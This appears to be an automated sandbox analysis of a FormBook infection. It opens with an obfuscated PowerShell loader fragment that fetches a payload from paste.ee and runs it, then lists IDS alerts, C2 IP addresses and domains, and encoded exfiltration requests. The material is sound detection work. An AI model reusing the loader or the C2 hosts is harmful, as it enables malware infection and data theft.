gBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7916, TargetFilename: C:\Users\user\AppData\Local\Temp\dll03.ps1
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5200, ProcessName: svchost.exe
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2025-04-15T17:04:39.783436+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49724 | 81.176.66.171 | 80 | TCP
                  2025-04-15T17:05:03.592953+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49910 | 199.59.243.228 | 80 | TCP
                  2025-04-15T17:05:17.705442+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49966 | 84.32.84.32 | 80 | TCP
                  2025-04-15T17:05:33.006054+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49970 | 66.29.132.106 | 80 | TCP
                  2025-04-15T17:05:55.183755+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49974 | 209.74.64.189 | 80 | TCP
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2025-04-15T17:04:06.342945+0200 | 2057635 | 1 | A Network Trojan was detected | 23.186.113.60 | 443 | 192.168.2.8 | 49698 | TCP
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2025-04-15T17:04:05.898903+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49698 | 23.186.113.60 | 443 | TCP
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2025-04-15T17:04:06.342945+0200 | 2858295 | 1 | A Network Trojan was detected | 23.186.113.60 | 443 | 192.168.2.8 | 49698 | TCP
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2025-04-15T17:04:01.611181+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49694 | 23.186.113.60 | 443 | TCP
                  2025-04-15T17:04:04.836508+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49696 | 23.186.113.60 | 443 | TCP
                  2025-04-15T17:04:05.898903+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49698 | 23.186.113.60 | 443 | TCP

                  AV Detection

                  Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000C.00000002.2229860985.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.2229410762.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.2226580404.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1277774749.0000000002860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2229866615.0000000002E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1258834116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1262010486.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000014.00000002.2232234775.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Submitted Sample | Neural Call Log Analysis: 99.5%
                  Source: unknown | HTTPS traffic detected: 104.22.69.199:443 -> 192.168.2.8:49693 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.8:49694 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.22.69.199:443 -> 192.168.2.8:49695 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.8:49696 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.8:49708 version: TLS 1.2
                  Source: Binary string: iexpress.pdbGCTL source: MSBuild.exe, 0000000A.00000002.1260131610.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000002.2228533425.00000000009EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 0000000A.00000002.1263394109.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000003.1261140619.0000000004BE7000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000003.1259127486.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004D90000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004F2E000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 0000000A.00000002.1263394109.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, iexpress.exe, 0000000C.00000003.1261140619.0000000004BE7000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000003.1259127486.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004D90000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004F2E000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DmMVOWsP1JSI77P.exe, 0000000B.00000000.1183432718.00000000003FF000.00000002.00000001.01000000.00000006.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2226912501.00000000003FF000.00000002.00000001.01000000.00000006.sdmp
                  Source: Binary string: iexpress.pdb source: MSBuild.exe, 0000000A.00000002.1260131610.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000002.2228533425.00000000009EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02EDC9A0 FindFirstFileW,FindNextFileW,FindClose, | 12_2_02EDC9A0

                  Software Vulnerabilities

                  Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 00007FF936859373h | 8_2_00007FF936859305
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 00007FF93685BEE6h | 8_2_00007FF93685BE8A
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 4x nop then xor eax, eax | 12_2_02EC9DC0
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 4x nop then mov ebx, 00000004h | 12_2_04CE04C0

                  Networking

                  Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49724 -> 81.176.66.171:80
                  Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49910 -> 199.59.243.228:80
                  Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49974 -> 209.74.64.189:80
                  Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49970 -> 66.29.132.106:80
                  Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49966 -> 84.32.84.32:80
                  Source: Network traffic | Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 23.186.113.60:443 -> 192.168.2.8:49698
                  Source: Network traffic | Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 23.186.113.60:443 -> 192.168.2.8:49698
                  Source: unknown | DNS query: name: pastebin.com
                  Source: unknown | DNS query: name: paste.ee
                  Source: DNS query: www.rtprubikslot-asli.xyz
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp | String found in memory: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                  Source: powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp | String found in memory: Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                  Source: Yara match | File source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, type: UNPACKEDPE
                  Source: global traffic | HTTP traffic detected: GET /raw/naAgdcTG HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /r/eqs49sJc/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /raw/XHtEkzdv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /r/Iheui3WE/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /r/49ZDOxRT/0 HTTP/1.1Host: paste.ee
                  Source: Joe Sandbox View | IP Address: 23.186.113.60 23.186.113.60
                  Source: Joe Sandbox View | IP Address: 23.186.113.60 23.186.113.60
                  Source: Joe Sandbox View | IP Address: 104.22.69.199 104.22.69.199
                  Source: Joe Sandbox View | ASN Name: RTCOMM-ASRU RTCOMM-ASRU
                  Source: Joe Sandbox View | ASN Name: NTT-LT-ASLT NTT-LT-ASLT
                  Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.8:49694 -> 23.186.113.60:443
                  Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49698 -> 23.186.113.60:443
                  Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.8:49698 -> 23.186.113.60:443
                  Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.8:49696 -> 23.186.113.60:443
                  Source: unknown | TCP traffic detected without corresponding DNS query: 2.19.104.63
                  Source: unknown | TCP traffic detected without corresponding DNS query: 23.60.201.147
                  Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.215
                  Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.215
                  Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
                  Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknown | TCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknown | TCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknown | TCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknown | TCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknown | TCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknown | TCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknown | TCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.215
                  Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.215
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic | HTTP traffic detected: GET /raw/naAgdcTG HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /r/eqs49sJc/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /raw/XHtEkzdv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /r/Iheui3WE/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /r/49ZDOxRT/0 HTTP/1.1Host: paste.ee
                  Source: global traffic | HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                  Source: global traffic | HTTP traffic detected: GET /x6zj/?8ro=uF08wju0cXQ&3h5hA=pkzXSxPTT2YrTAYwTOcaicIRCimt47DVGFikR34exbY7UM7MJB5O+t5uY0YUTOYuZZ9XJQ2pXVe5ZrMcvuCkGXKDcloX44WZGHSYd2H3avFbIg3fwy0erPntJaR8L4pL1Q== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.samlib.ruConnection: closeUser-Agent: 45.0.2454.0 (Windows NT 5.2) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/45.0.2454.8.742.8 Safari/534.1
                  Source: global traffic | HTTP traffic detected: GET /q311/?3h5hA=bke8j7cp8lJWsQ5WQiLuQmqBNA5ipjzHiB2sc2JWPfAhnYGd6znGVJIedsMDLkzs00I3QP9tMj756FQFYX4LVqe+kmGhFneDbc3KkqJedizo/c0Ucx4amu0gnd58xjoeBQ==&8ro=uF08wju0cXQ HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.nkq.infoConnection: closeUser-Agent: 45.0.2454.0 (Windows NT 5.2) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/45.0.2454.8.742.8 Safari/534.1
                  Source: global traffic | HTTP traffic detected: GET /x1ko/?8ro=uF08wju0cXQ&3h5hA=Mv2acbwiL4oNRjyGZZU1Zt7AVrfdhL7V4DwpB2S3Sz4/doIBMaaJL0B7TjNkp0qEn328fg/za7Woow3J3g5dySaE0ZjcX3AVAQmlCSx21G2meWoM1WEI2gYXBpvR5j2HSg== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.reviewsonline.shopConnection: closeUser-Agent: 45.0.2454.0 (Windows NT 5.2) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/45.0.2454.8.742.8 Safari/534.1
                  Source: global traffic | HTTP traffic detected: GET /9oy0/?3h5hA=lky7435UELIKzB0myTA999dbf/jP++z67a9y8PRwl0eZ3Bm8hWcizV8nyFsUfJXeK9OG8/nicaY+NZ1XFddP2vRCJaEF5MEOHIiontz5u/RfGO1S6v6yaBBBtiXShFUgdA==&8ro=uF08wju0cXQ HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.rtprubikslot-asli.xyzConnection: closeUser-Agent: 45.0.2454.0 (Windows NT 5.2) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/45.0.2454.8.742.8 Safari/534.1
                  Source: global traffic | HTTP traffic detected: GET /r2h5/?3h5hA=8+IhhEvWUMhCGERLVzJwCdYPDDQ6Zj4bBkXGIcD1MTK6M4IbbHQVZI/CI3cKh6Yxaer0okw0YJR9Wy8gNiCXAEqY05WGIYHsJpMWKPMQ77csvWGmMwiL96d2TVFUIX/Ppw==&8ro=uF08wju0cXQ HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.snappypeak.topConnection: closeUser-Agent: 45.0.2454.0 (Windows NT 5.2) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/45.0.2454.8.742.8 Safari/534.1
                  Source: global traffic | DNS traffic detected: DNS query: pastebin.com
                  Source: global traffic | DNS traffic detected: DNS query: paste.ee
                  Source: global traffic | DNS traffic detected: DNS query: c.pki.goog
                  Source: global traffic | DNS traffic detected: DNS query: otelrules.svc.static.microsoft
                  Source: global traffic | DNS traffic detected: DNS query: www.samlib.ru
                  Source: global traffic | DNS traffic detected: DNS query: www.nkq.info
                  Source: global traffic | DNS traffic detected: DNS query: www.reviewsonline.shop
                  Source: global traffic | DNS traffic detected: DNS query: www.rtprubikslot-asli.xyz
                  Source: global traffic | DNS traffic detected: DNS query: www.joebiden.baby
                  Source: global traffic | DNS traffic detected: DNS query: www.snappypeak.top
                  Source: global traffic | DNS traffic detected: DNS query: www.storii.shop
                  Source: unknownHTTP traffic detected: POST /q311/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enHost: www.nkq.infoOrigin: http://www.nkq.infoReferer: http://www.nkq.info/q311/Cache-Control: max-age=0Content-Length: 206Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: 45.0.2454.0 (Windows NT 5.2) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/45.0.2454.8.742.8 Safari/534.1Data Raw: 33 68 35 68 41 3d 57 6d 32 63 67 4d 41 59 37 48 39 6b 6c 6e 31 43 62 67 33 2f 58 42 47 78 4f 45 70 4c 6d 52 53 34 6c 6d 44 75 54 77 4e 67 4f 37 35 46 68 76 72 6c 72 51 66 6d 54 70 6b 37 44 76 74 79 4e 31 48 52 31 6c 56 44 65 74 64 54 58 68 33 68 67 33 5a 35 64 6d 4e 76 5a 6f 65 39 6c 6d 6a 2f 45 55 57 42 63 35 62 43 39 59 34 75 4b 67 65 76 30 35 4a 56 5a 69 67 47 6c 4d 4d 66 6b 6f 74 6c 35 45 77 53 61 65 30 55 7a 48 5a 5a 75 6f 69 46 54 54 62 55 43 41 5a 76 70 45 34 38 52 64 5a 56 78 32 34 48 61 7a 37 43 4f 30 35 77 48 49 4e 49 74 31 66 4b 74 56 37 73 71 63 76 52 4e 4e 4f 33 4c 45 50 34 71 63 52 39 65 30 45 3d Data Ascii: 3h5hA=Wm2cgMAY7H9kln1Cbg3/XBGxOEpLmRS4lmDuTwNgO75FhvrlrQfmTpk7DvtyN1HR1lVDetdTXh3hg3Z5dmNvZoe9lmj/EUWBc5bC9Y4uKgev05JVZigGlMMfkotl5EwSae0UzHZZuoiFTTbUCAZvpE48RdZVx24Haz7CO05wHINIt1fKtV7sqcvRNNO3LEP4qcR9e0E=
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 15 Apr 2025 15:05:23 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 
20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 15 Apr 2025 15:05:26 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 